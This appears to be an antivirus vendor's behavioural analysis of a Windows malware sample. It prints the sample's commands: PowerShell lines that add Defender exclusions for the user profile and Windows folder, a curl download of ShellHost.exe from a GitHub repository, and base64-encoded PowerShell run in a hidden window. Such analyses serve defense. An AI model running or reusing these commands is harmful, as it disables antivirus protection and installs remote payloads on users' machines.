Technical Information
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath $env:USERPROFILE -FORCE ; Add-MpPreference -ExclusionPath %WINDIR% -FORCE ; CURL -O "$env:TEMP\ShellHost.exe" https://github.com/Sys32-dll/st/raw/refs/heads/main...
Network activity
Connects to
- 'gi##ub.com':443
TCP
Other
- 'gi##ub.com':443
UDP
- DNS ASK gi##ub.com
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /c Powershell -enc UwBUAEEAUgBUACAAUABPAFcARQBSAFMASABFAEwATAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAIAAnAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAG...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBUAEEAUgBUACAAUABPAFcARQBSAFMASABFAEwATAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAIAAnAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath $env:USERPROFILE -FORCE ; Add-MpPreference -ExclusionPath %WINDIR% -FORCE ; CURL -O "$env:TEMP\ShellHost.exe" https://github.com/Sys32-dll/st/raw/refs/heads/main...' (with hidden window)
